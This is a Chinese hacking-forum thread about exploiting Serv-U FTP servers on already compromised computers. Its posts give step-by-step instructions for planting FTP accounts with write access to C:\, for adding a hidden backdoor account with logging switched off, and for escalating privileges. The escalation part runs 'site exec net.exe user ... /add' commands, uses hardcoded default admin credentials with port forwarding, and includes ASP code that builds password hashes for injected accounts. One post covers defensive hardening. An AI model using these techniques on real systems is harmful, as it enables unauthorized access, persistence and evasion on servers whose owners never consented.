首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册

正在浏览:   1 名游客





如何利用肉鸡上的Serv-U Ftp服务器
网站管理员
注册日期:
1970/1/1 8:00
所属群组:
网站管理员
注册会员
帖子: 56
等级: 6; EXP: 34
HP : 0 / 133
MP : 18 / 19576
离线
很多肉鸡安装了serv-U服务器,我们可以把它利用起来,下面的方法是可以通过telnet或者nc命令行直接修改serv-U的参数而利用之。

在serv-U的目录下有一个servudaemon.ini,关键是修改servudaemon.ini,第一步,当然是要先把对方的servudaemon.ini下载回来,在本机把它修改好。至于怎么把这个文件取回来不是这里讨论的问题,方法很多。

下面请看一个servdaemon.ini的范例,<>中是我写的说明文字,不是文件中的文字。

[GLOBAL] <定义一些全局参数>
Version=4.0.0.4
RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAawEEBLH71T7nA+cDAgAIUm9nZXJMZWUSbGls

aW5nanVuQHNpbmEuY29tB0VDTGlQU0UA
ProcessID=1748
[DOMAINS] <在这里定义域名及IP,端口号>
Domain1=0.0.0.0||21|Wizard Generated Domain|1|0
[Domain1] <用户名的定义>
User1=Anonymous|1|0 <第一个用户是anonymous,即匿名用户,允许匿名用户访问>
User2=1|1|0 <第二个用户是1>
User3=2|1|0 <第三个用户是2>
[USER=Anonymous|1] <用户“anonymous”的定义>
HomeDir=d:\wutemp <用户anonymous的根目录>
RelPaths=1 <锁定在根目录,如果不锁定在根目录可以把该行删除>
TimeOut=600
Note1="Wizard generated account"
Access1=D:\WUTemp|RLP <用户anonymous权限设置在此处,R表示读文件,L表示目录列表,最后一个P必须有>
[USER=2|1] <用户“2”的定义>
Password=cuA40FB53D1C89D1E7153EF826B6B38DC3 <用户密码设定,我不知道怎么破这个密码,如果不设密码可以把该行删除>
HomeDir=D:\temp
RelPaths=1
TimeOut=600
Access1=D:\temp|RLP <用户“2”可以读取d:\temp目录下的文件,所以可以下载文件>
[USER=1|1] <用户“1”的定义>
Password=hv12154DF65AC601DDA5D39C2F7B2E0F4C
HomeDir=d:\temp
RelPaths=1
TimeOut=600
Access1=D:\temp|RWLP <用户“1”对d:\temp有列目录的权利,可以读写该目录下的文件>

权限设定具体说明:
RL 只能读文件,下载文件
RWL 可以写文件,所以可以上载文件
RWML M是可以删除的权限
RWAMEL A是添加权限,E是执行权限
RWLCD C是目录创建权限,D是目录删除权限

OK,所以首先是把对方的servudaemon.ini下载到本地的机器上,根据自己的需要把这个文件修改好,然后再传上去覆盖原文件。

修改的步骤是在[DOMAIN1]中先添加用户名称,如上例中已经有三个用户anonymous、1、2,再添加一个用户3,密码为空,在d:\temp目录下可以读写文件、创建删除目录,不锁定在本目录,同时对C:\有访问权限。

先在[Domain1]下增加一个用户,如下:
user4=3|1|0

然后再增加一个段,说明用户“3”的权限
[user3|1]
HomeDir=d:\temp
TimeOut=600
Access1=D:\temp|RWLCDP
Access2=C:\|RLP

[ 发表时间:2003-6-7 20:33:35 ]





标题:hehe caine


在 Serv-U 中建立隐藏用户(本地通过,未经肉鸡测试~~希望大家完善本文)

在如今的 FTP 服务段软件中,Serv-U 以其简单易用性成为广大管理员的首选,当我
们控制一台肉鸡后,如果它采用 Serv-U 管理 FTP ,我们该如何建立一个隐藏的 FTP 账
户来下载他的东东呢?

我们可以采用 Serv-U Assistant 这个软件,可以到作者网页 http://www.katkat.com/
者在华军下载(目前版本为1.01)

这个软件主要用于扩充 Serv-U 的帐号管理, 它采用Serv-U扩展库,实现的原理为“帐
号-映射”,建立一个或多个帐号“映射”,当在 Serv-U 中设置好一个固定帐号(即Serv-U
的帐号)后,“映射帐号”就继承了这个固定帐号的所有权限设置,每个“映射帐号” 有各
自的登录密码。

下载压缩文件 AssServU.zip,解压后得到以下文件:
AssServU.dll -------- 扩充功能库
AssServU.exe -------- 管理主程序
AssServU.ini -------- 配置文件
AssServU.mdb -------- 数据库文件
AssReadme.mht ------- 自述文件

我们的目的是为了隐藏我们 FTP 账号,因此第一步我们要获取肉鸡上的一个 Serv-U
的账户名(仅账户名而已):3389图形界面可以通过 ServUAdmin.exe 获得;命令行下可以
通过 ServUDaemon.ini 获得,当然最好获得权限比较大的用户名(因为我们的隐藏账号的
权限与他的相同)

第二步:在自己的机器上做好配置:首先为了隐藏的需要,我们将assServU.mdb复制
一份为ServU.dat ,将assServU.dll改名为ServU.dll ;
双击 assServU.exe ,在 Settting 选项卡下的 Log options 中去掉 Log system
messages 、 Log error messages 、 Log file dosnloads 、 Log file uploads 前面的勾(这是
为了系统不记录日志);在 Account Datasource 中选 Custom ,在 Connection string 点
Set ,在“连接”选项卡中的“1。选择或输入数据库名称”中将 AssServU.mdb 改为
Servu.dat ,然后点“确定”,在退回 Setting 选项卡后点 Save 。
在 Account 选项卡下添加用户, Username 为你想添加的用户,如:hacker, Password
为你的密码,如:123, Serv-U account 为第一步中你选择的权限较大的用户,如:admin,
然后点 Save 按钮。

好了,配置完成。

第三步:上传我们的 ServU.dat 和 ServU.dll ,修改肉鸡的 ServUDaemon.ini 文件,添加
以下字段:
[EXTERNAL]
ClientCheckDLL1=ServU.dll
然后重起Serv-U 服务

这样你就可以用隐藏账号登陆了,此时登陆账号还是第一步你选择的账号,但密码格式
为“你的用户名=密码”,如果你像第二步那样设置的话,登陆名就为admin,密码为hacker=111


http://nc.onlinedown.net/down/AssServU_101.zip

2005/7/23 14:24
应用扩展 工具箱


Re: 如何利用肉鸡上的Serv-U Ftp服务器
网站管理员
注册日期:
1970/1/1 8:00
所属群组:
网站管理员
注册会员
帖子: 56
等级: 6; EXP: 34
HP : 0 / 133
MP : 18 / 19576
离线
Serv-U FTP Server本地提升权限缺陷

创建时间:2003-12-24 更新时间:2003-12-24
文章属性:原创
文章提交:Fedora (justaid_at_sohu.com)

(如不能发表,请勿转入论坛,Thank you.)

发现时间:2003-12-20
文章属性:原创
作者:Fedora (justaid_at_sohu.com)
漏洞描述:
Serv-U FTP Server为RhinoSoft出品的一款Ftp Server软件,可运行在Microsoft Windows平台下。
ServUAdmin.exe是ftp server管理界面,由于ServUAdmin.exe对异常的不正确处理,导致在Serv-U被
注册为系统服务的情况下,本地普通用户进行权限提升,得到超级用户的权限。远程用普通用户权限,可
以通过3389登陆的也可以进行提升。

测试方法:

测试环境:
MICROSOFT WINDOWS 2000(SP4)+Serv-U FTP Server 4.0.0.4
MICROSOFT WINDOWS SERVER 2003, ENTERPRISE EDITION+Serv-U FTP Server 4.0.0.4

测试方法:
一、安装Serv-U
以普通用户登陆,权限不够,不能安装,重新以administrator登陆安装Serv-U(默认安装,此时Serv-U
的启动方式为自动启动,已经注册为系统服务),安装好之后,启动Serv-U,然后就注销administrator。

二、提升权限
用普通用户登陆,进入Serv-U FTP Server的安装目录,运行ServUAdmin.exe,新建域,而且添加用户,
新建用户ftpuser,把主目录设置为系统目录C:,此时用户ftpuser的权限为R----L--I,将用户权限设置为
系统管理员,甚至更高级别的,或者将用户对目录的访问权限设置为读写删除执行,跳出ServUAdmin.ini
不能写入,ServUAdmin.exe同时以system权限对ServUAdmin.ini进行改写。这样ftpuser通过ftp就具有了
对系统目录的读写删除执行的权限。这样就可以进行权限提升了,你可以传个木马上去,再运行,或者直
接添加系统用户。
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v4.0 for WinSock ready...
User (ip:(none)): ftpuser //输入ftp用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是win 2003就应该为windows目录。
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user cc cc /add //利用net命令添加用户。
200 EXEC command successful (TID=33).
ftp>quote site exec net.exe localhost administrators cc /add //提升为超级用户

漏洞分析
1、只能以administrator安装Serv-U,其配置文件ServUDaemon.ini和ServUAdmin.ini。ntfs格式默认情
况普通用户只具有读和运行的权限(默认情况下只有admin和system有写权限),无法通过对他们改写来
提升权限。
2、当Serv-U成为系统服务的时候,就具有了system的权限,ServUAdmin.exe虽然进行了权限验证,但由
于对异常处理不正确,对ServUAdmin.ini进行了写操作,从而导致了漏洞的产生。

感谢紫幻,没有他那篇文章,我就不会打Serv-U的主意。

声明
本本仅用来描述可能存在的安全问题,作者本人不为此安全公告提供任何保证或承诺。由于传播、利用此
文章提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任
何责任。作者拥有对此安全公告的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包
括版权声明等全部内容。未经作者本人允许,不得任意修改或者增减此文章公告内容。


EYAS注:
serv-u默认监听127.0.0.1:43958,所以只有在本机才能连接这个管理端口。
serv-u默认管理账号是LocalAdministrator,默认密码是"#l@$ak#.lk;0@P",这个密码在同一个
版本中是固定的,也许在不同的版本中也是固定的。
假如目标机器IP是192.168.0.1,假如你已经有了一个目标机器的普通权限的SHELL,那么你
在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的机器,用"serv-u
admin"新建SERVER,
192.168.0.1:12345
User:LocalAdministrator
Pass:"#l@$ak#.lk;0@P"
,那么目标机器的serv-u就归你管了。
(不需要能终端或物理控制台登录,只要有个shell,能运行端口数据转发的程序就可以了)

2005/7/23 14:25
应用扩展 工具箱


Re: 如何利用肉鸡上的Serv-U Ftp服务器
网站管理员
注册日期:
1970/1/1 8:00
所属群组:
网站管理员
注册会员
帖子: 56
等级: 6; EXP: 34
HP : 0 / 133
MP : 18 / 19576
离线
serv-U FTP软件的攻击防守
作者:剑气凌人 来源:蓝色理想

在看这篇文章之前,有几点要注意

1、everyone用户完全控制目录在服务器上绝对不能出现

2、WEB目录上的权限都是独立的一般情况下是读取和写入,无运行权利

3、ipsec做了限定相关出入站端口访问

Serv-u本地默认管理端口,以默认管理员登陆新建域和用户来执行命令,Serv-u V3.x以上的版本默认本地管理端口是:127.0.0.1:43958,所以只能本机连接,默认管理员:

LocalAdministrator,默认密码:#l@$ak#.lk;0@P,这是集成在Serv-u内部的,可以以Guest权限来进连接,对Serv-u进行管理,如图1






防止办法和对策:

serv-U v6以下的版本可以直接用Ultraedit修改文件ServUDaemon.exe和ServUAdmin.exe,把默认密码修改成等长度的其它字符就可以了,用Ultraedit打开ServUAdmin.exe查找最后一个B6AB(43958的16进制),替换成自定义的端口比如3930(12345),不过因为serv-U v6以下版本有远程缓冲区溢出漏洞,不建议使用serv-U v6以上的版本可以在ServUDaemon.ini中加上LocalSetupPortNo=12345,可改变默认的管理端口,采用ipsec限制任何IP访问12345端口访问,即增加12345端口的阻止,如果不改默认端口,就增加43958端口的阻止,如果"使用设置更改密码"的按钮,即在 ServUDaemon.ini中加上LocalSetupPassword=ah6A0ED50ADD0A516DA36992DB43F3AA39之类的MD5密码,如果不修改默认管理密码的话,原来的#l@$ak#.lk;0@P依旧保存只有当密码为空时使用,再加上管理端口的限定LocalSetupPortNo=12345。









当然程序中也要改端口的设置目录权限,通过去掉Web目录IIS访问用户的执行权限来防止使用Webshell来运行Exp程序,但这个方法有一定的局限性,需要设置的目录很多,不能有一点疏漏,如果有一个目录设置错误,就会导致可以在这个目录上传并运行Exp,因为WEB上的权限都是独立的一般情况下是读取和写入.无运行权利.那么上传其他文件进行执行成功可能性不大,修改Serv-u安装目录C:\Program Files\Serv-U的权限(比如说这个目录,不过为了安全,请不要使用默认目录),administrator组完全控制,拒绝Guests组用户访问Serv-U目录,这是防止用户使用webshell来下载ServUDaemon.exe,用Ultraedit打开分析Serv-U的帐号密码,并修改编译上传运行,那前面做的工作都没有作用了,因为这里默认管理端口在程序文件中已经修改,在ServUDaemon.ini中也已经修改,这样来说默认的管理员连接不上了。









最后一条,因为Serv-U是以服务启动默认是以System权限运行的,才会有被权限提升的可能。只需要把Serv-U的启动用户改成一个USER组的用户,那么就再不会有所谓的权限提升了。但要注意的是,这个低权限用户一定要对Serv-U安装目录和提供FTP服务的目录或盘符有完全控制的权限。经测试发现,使用普通组用户启动的Serv-U是不能增加用户和删除用户的,其他一切正常。

2005/7/23 14:29
应用扩展 工具箱


Re: 如何利用肉鸡上的Serv-U Ftp服务器
网站管理员
注册日期:
1970/1/1 8:00
所属群组:
网站管理员
注册会员
帖子: 56
等级: 6; EXP: 34
HP : 0 / 133
MP : 18 / 19576
离线
Serv-U ftp server 密码算法
作者:lilo[BST]


测试环境:SERV-U 4.1 & 5.0 & 5.004
测试结果:测试通过
测试方法:
输入明文后点提交,而后将下面文本框中的散列复制下来,粘贴到Serv-U的ServUDaemon.ini文件中,而后重新启动Serv-u服务。即可测试密码是否正确。
测试时发现,直接在INI文件中添加的账户,无须启动SERV-U即可登陆,但如果你同时添加了一些虚拟目录的话,虚拟目录需要服务器重起时才能生效。
另外,如果修改INI时,填写了错误的信息,造成该用户无法登陆,在不重新启动服务的情况下,无论再次怎么修改,该用户也无法正常登陆了,解决方法:
修改该用户名,并将纠正错误的配置信息,即可登陆。
asp代码:

代码:

------------------------------------------------------------------------------

<%
Private Const BITS_TO_A_BYTE = 8
Private Const BYTES_TO_A_WORD = 4
Private Const BITS_TO_A_WORD = 32

Private m_lOnBits(30)
Private m_l2Power(30)

Private Function LShift(lValue, iShiftBits)
If iShiftBits = 0 Then
LShift = lValue
Exit Function
ElseIf iShiftBits = 31 Then
If lValue And 1 Then
LShift = &H80000000
Else
LShift = 0
End If
Exit Function
ElseIf iShiftBits < 0 Or iShiftBits > 31 Then
Err.Raise 6
End If


If (lValue And m_l2Power(31 - iShiftBits)) Then
LShift = ((lValue And m_lOnBits(31 - (iShiftBits + 1))) * m_l2Power(iShiftBits)) Or &H80000000
Else
LShift = ((lValue And m_lOnBits(31 - iShiftBits)) * m_l2Power(iShiftBits))
End If
End Function


Private Function RShift(lValue, iShiftBits)
If iShiftBits = 0 Then
RShift = lValue
Exit Function
ElseIf iShiftBits = 31 Then
If lValue And &H80000000 Then
RShift = 1
Else
RShift = 0
End If
Exit Function
ElseIf iShiftBits < 0 Or iShiftBits > 31 Then
Err.Raise 6
End If

RShift = (lValue And &H7FFFFFFE) \ m_l2Power(iShiftBits)


If (lValue And &H80000000) Then
RShift = (RShift Or (&H40000000 \ m_l2Power(iShiftBits - 1)))
End If
End Function


Private Function RotateLeft(lValue, iShiftBits)
RotateLeft = LShift(lValue, iShiftBits) Or RShift(lValue, (32 - iShiftBits))
End Function


Private Function AddUnsigned(lX, lY)
Dim lX4
Dim lY4
Dim lX8
Dim lY8
Dim lResult

lX8 = lX And &H80000000
lY8 = lY And &H80000000
lX4 = lX And &H40000000
lY4 = lY And &H40000000

lResult = (lX And &H3FFFFFFF) + (lY And &H3FFFFFFF)

If lX4 And lY4 Then
lResult = lResult Xor &H80000000 Xor lX8 Xor lY8
ElseIf lX4 Or lY4 Then
If lResult And &H40000000 Then
lResult = lResult Xor &HC0000000 Xor lX8 Xor lY8
Else
lResult = lResult Xor &H40000000 Xor lX8 Xor lY8
End If
Else
lResult = lResult Xor lX8 Xor lY8
End If

AddUnsigned = lResult
End Function


Private Function md5_F(x, y, z)
md5_F = (x And y) Or ((Not x) And z)
End Function


Private Function md5_G(x, y, z)
md5_G = (x And z) Or (y And (Not z))
End Function


Private Function md5_H(x, y, z)
md5_H = (x Xor y Xor z)
End Function


Private Function md5_I(x, y, z)
md5_I = (y Xor (x Or (Not z)))
End Function


Private Sub md5_FF(a, b, c, d, x, s, ac)
a = AddUnsigned(a, AddUnsigned(AddUnsigned(md5_F(b, c, d), x), ac))
a = RotateLeft(a, s)
a = AddUnsigned(a, b)
End Sub


Private Sub md5_GG(a, b, c, d, x, s, ac)
a = AddUnsigned(a, AddUnsigned(AddUnsigned(md5_G(b, c, d), x), ac))
a = RotateLeft(a, s)
a = AddUnsigned(a, b)
End Sub


Private Sub md5_HH(a, b, c, d, x, s, ac)
a = AddUnsigned(a, AddUnsigned(AddUnsigned(md5_H(b, c, d), x), ac))
a = RotateLeft(a, s)
a = AddUnsigned(a, b)
End Sub


Private Sub md5_II(a, b, c, d, x, s, ac)
a = AddUnsigned(a, AddUnsigned(AddUnsigned(md5_I(b, c, d), x), ac))
a = RotateLeft(a, s)
a = AddUnsigned(a, b)
End Sub


Private Function ConvertToWordArray(sMessage)
Dim lMessageLength
Dim lNumberOfWords
Dim lWordArray()
Dim lBytePosition
Dim lByteCount
Dim lWordCount

Const MODULUS_BITS = 512
Const CONGRUENT_BITS = 448

lMessageLength = Len(sMessage)

lNumberOfWords = (((lMessageLength + ((MODULUS_BITS - CONGRUENT_BITS) \ BITS_TO_A_BYTE)) \ (MODULUS_BITS \ BITS_TO_A_BYTE)) + 1) * (MODULUS_BITS \ BITS_TO_A_WORD)
ReDim lWordArray(lNumberOfWords - 1)

lBytePosition = 0
lByteCount = 0
Do Until lByteCount >= lMessageLength
lWordCount = lByteCount \ BYTES_TO_A_WORD
lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE
lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(Asc(Mid(sMessage, lByteCount + 1, 1)), lBytePosition)
lByteCount = lByteCount + 1
Loop


lWordCount = lByteCount \ BYTES_TO_A_WORD
lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE


lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(&H80, lBytePosition)


lWordArray(lNumberOfWords - 2) = LShift(lMessageLength, 3)
lWordArray(lNumberOfWords - 1) = RShift(lMessageLength, 29)

ConvertToWordArray = lWordArray
End Function


Private Function WordToHex(lValue)
Dim lByte
Dim lCount

For lCount = 0 To 3
lByte = RShift(lValue, lCount * BITS_TO_A_BYTE) And m_lOnBits(BITS_TO_A_BYTE - 1)
WordToHex = WordToHex & Right("0" & Hex(lByte), 2)
Next
End Function


Private Function MD5(sMessage)
m_lOnBits(0) = CLng(1)
m_lOnBits(1) = CLng(3)
m_lOnBits(2) = CLng(7)
m_lOnBits(3) = CLng(15)
m_lOnBits(4) = CLng(31)
m_lOnBits(5) = CLng(63)
m_lOnBits(6) = CLng(127)
m_lOnBits(7) = CLng(255)
m_lOnBits(8) = CLng(511)
m_lOnBits(9) = CLng(1023)
m_lOnBits(10) = CLng(2047)
m_lOnBits(11) = CLng(4095)
m_lOnBits(12) = CLng(8191)
m_lOnBits(13) = CLng(16383)
m_lOnBits(14) = CLng(32767)
m_lOnBits(15) = CLng(65535)
m_lOnBits(16) = CLng(131071)
m_lOnBits(17) = CLng(262143)
m_lOnBits(18) = CLng(524287)
m_lOnBits(19) = CLng(1048575)
m_lOnBits(20) = CLng(2097151)
m_lOnBits(21) = CLng(4194303)
m_lOnBits(22) = CLng(8388607)
m_lOnBits(23) = CLng(16777215)
m_lOnBits(24) = CLng(33554431)
m_lOnBits(25) = CLng(67108863)
m_lOnBits(26) = CLng(134217727)
m_lOnBits(27) = CLng(268435455)
m_lOnBits(28) = CLng(536870911)
m_lOnBits(29) = CLng(1073741823)
m_lOnBits(30) = CLng(2147483647)

m_l2Power(0) = CLng(1)
m_l2Power(1) = CLng(2)
m_l2Power(2) = CLng(4)
m_l2Power(3) = CLng(8)
m_l2Power(4) = CLng(16)
m_l2Power(5) = CLng(32)
m_l2Power(6) = CLng(64)
m_l2Power(7) = CLng(128)
m_l2Power(8) = CLng(256)
m_l2Power(9) = CLng(512)
m_l2Power(10) = CLng(1024)
m_l2Power(11) = CLng(2048)
m_l2Power(12) = CLng(4096)
m_l2Power(13) = CLng(8192)
m_l2Power(14) = CLng(16384)
m_l2Power(15) = CLng(32768)
m_l2Power(16) = CLng(65536)
m_l2Power(17) = CLng(131072)
m_l2Power(18) = CLng(262144)
m_l2Power(19) = CLng(524288)
m_l2Power(20) = CLng(1048576)
m_l2Power(21) = CLng(2097152)
m_l2Power(22) = CLng(4194304)
m_l2Power(23) = CLng(8388608)
m_l2Power(24) = CLng(16777216)
m_l2Power(25) = CLng(33554432)
m_l2Power(26) = CLng(67108864)
m_l2Power(27) = CLng(134217728)
m_l2Power(28) = CLng(268435456)
m_l2Power(29) = CLng(536870912)
m_l2Power(30) = CLng(1073741824)



Dim x
Dim k
Dim AA
Dim BB
Dim CC
Dim DD
Dim a
Dim b
Dim c
Dim d

Const S11 = 7
Const S12 = 12
Const S13 = 17
Const S14 = 22
Const S21 = 5
Const S22 = 9
Const S23 = 14
Const S24 = 20
Const S31 = 4
Const S32 = 11
Const S33 = 16
Const S34 = 23
Const S41 = 6
Const S42 = 10
Const S43 = 15
Const S44 = 21


x = ConvertToWordArray(sMessage)

a = &H67452301
b = &HEFCDAB89
c = &H98BADCFE
d = &H10325476


For k = 0 To UBound(x) Step 16
AA = a
BB = b
CC = c
DD = d

md5_FF a, b, c, d, x(k + 0), S11, &HD76AA478
md5_FF d, a, b, c, x(k + 1), S12, &HE8C7B756
md5_FF c, d, a, b, x(k + 2), S13, &H242070DB
md5_FF b, c, d, a, x(k + 3), S14, &HC1BDCEEE
md5_FF a, b, c, d, x(k + 4), S11, &HF57C0FAF
md5_FF d, a, b, c, x(k + 5), S12, &H4787C62A
md5_FF c, d, a, b, x(k + 6), S13, &HA8304613
md5_FF b, c, d, a, x(k + 7), S14, &HFD469501
md5_FF a, b, c, d, x(k + 8), S11, &H698098D8
md5_FF d, a, b, c, x(k + 9), S12, &H8B44F7AF
md5_FF c, d, a, b, x(k + 10), S13, &HFFFF5BB1
md5_FF b, c, d, a, x(k + 11), S14, &H895CD7BE
md5_FF a, b, c, d, x(k + 12), S11, &H6B901122
md5_FF d, a, b, c, x(k + 13), S12, &HFD987193
md5_FF c, d, a, b, x(k + 14), S13, &HA679438E
md5_FF b, c, d, a, x(k + 15), S14, &H49B40821

md5_GG a, b, c, d, x(k + 1), S21, &HF61E2562
md5_GG d, a, b, c, x(k + 6), S22, &HC040B340
md5_GG c, d, a, b, x(k + 11), S23, &H265E5A51
md5_GG b, c, d, a, x(k + 0), S24, &HE9B6C7AA
md5_GG a, b, c, d, x(k + 5), S21, &HD62F105D
md5_GG d, a, b, c, x(k + 10), S22, &H2441453
md5_GG c, d, a, b, x(k + 15), S23, &HD8A1E681
md5_GG b, c, d, a, x(k + 4), S24, &HE7D3FBC8
md5_GG a, b, c, d, x(k + 9), S21, &H21E1CDE6
md5_GG d, a, b, c, x(k + 14), S22, &HC33707D6
md5_GG c, d, a, b, x(k + 3), S23, &HF4D50D87
md5_GG b, c, d, a, x(k + 8), S24, &H455A14ED
md5_GG a, b, c, d, x(k + 13), S21, &HA9E3E905
md5_GG d, a, b, c, x(k + 2), S22, &HFCEFA3F8
md5_GG c, d, a, b, x(k + 7), S23, &H676F02D9
md5_GG b, c, d, a, x(k + 12), S24, &H8D2A4C8A

md5_HH a, b, c, d, x(k + 5), S31, &HFFFA3942
md5_HH d, a, b, c, x(k + 8), S32, &H8771F681
md5_HH c, d, a, b, x(k + 11), S33, &H6D9D6122
md5_HH b, c, d, a, x(k + 14), S34, &HFDE5380C
md5_HH a, b, c, d, x(k + 1), S31, &HA4BEEA44
md5_HH d, a, b, c, x(k + 4), S32, &H4BDECFA9
md5_HH c, d, a, b, x(k + 7), S33, &HF6BB4B60
md5_HH b, c, d, a, x(k + 10), S34, &HBEBFBC70
md5_HH a, b, c, d, x(k + 13), S31, &H289B7EC6
md5_HH d, a, b, c, x(k + 0), S32, &HEAA127FA
md5_HH c, d, a, b, x(k + 3), S33, &HD4EF3085
md5_HH b, c, d, a, x(k + 6), S34, &H4881D05
md5_HH a, b, c, d, x(k + 9), S31, &HD9D4D039
md5_HH d, a, b, c, x(k + 12), S32, &HE6DB99E5
md5_HH c, d, a, b, x(k + 15), S33, &H1FA27CF8
md5_HH b, c, d, a, x(k + 2), S34, &HC4AC5665

md5_II a, b, c, d, x(k + 0), S41, &HF4292244
md5_II d, a, b, c, x(k + 7), S42, &H432AFF97
md5_II c, d, a, b, x(k + 14), S43, &HAB9423A7
md5_II b, c, d, a, x(k + 5), S44, &HFC93A039
md5_II a, b, c, d, x(k + 12), S41, &H655B59C3
md5_II d, a, b, c, x(k + 3), S42, &H8F0CCC92
md5_II c, d, a, b, x(k + 10), S43, &HFFEFF47D
md5_II b, c, d, a, x(k + 1), S44, &H85845DD1
md5_II a, b, c, d, x(k + 8), S41, &H6FA87E4F
md5_II d, a, b, c, x(k + 15), S42, &HFE2CE6E0
md5_II c, d, a, b, x(k + 6), S43, &HA3014314
md5_II b, c, d, a, x(k + 13), S44, &H4E0811A1
md5_II a, b, c, d, x(k + 4), S41, &HF7537E82
md5_II d, a, b, c, x(k + 11), S42, &HBD3AF235
md5_II c, d, a, b, x(k + 2), S43, &H2AD7D2BB
md5_II b, c, d, a, x(k + 9), S44, &HEB86D391

a = AddUnsigned(a, AA)
b = AddUnsigned(b, BB)
c = AddUnsigned(c, CC)
d = AddUnsigned(d, DD)
Next

MD5 = UCase(WordToHex(a) & WordToHex(b) & WordToHex(c) & WordToHex(d))
End Function


Public function ServU(strpass)
Randomize
AA = chr(Int((97 - 122 + 1) * Rnd() + 122))
BB= lcase(chr(Int((65 - 90 + 1) * Rnd() + 90)))
ServU = md5(AA & BB & strpass)
ServU = AA & BB & ServU
end function
Pass=Request("md5")
If Len(Pass)=0 Then Pass="Serv-U密码算法演示"
%>
<head>
<title>Serv-U密码算法器</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style>BODY,TD,INPUT</style>
</head>
<body bgcolor="#FFFFFF" text="#000000">
<form name="md5pass" method="post" >
明文:<input type="text" name="md5" value="<%=Pass%>">
<input type="submit" name="Submit" value="提交">
</form>
散列:<input type=text size=34 maxlength=16 value='<%=ServU(Pass)%>'>

2005/7/23 14:31
应用扩展 工具箱






可以查看帖子.
不可发帖.
不可回复.
不可编辑自己的帖子.
不可删除自己的帖子.
不可发起投票调查.
不可在投票调查中投票.
不可上传附件.
不可不经审核直接发帖.

[高级搜索]



系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号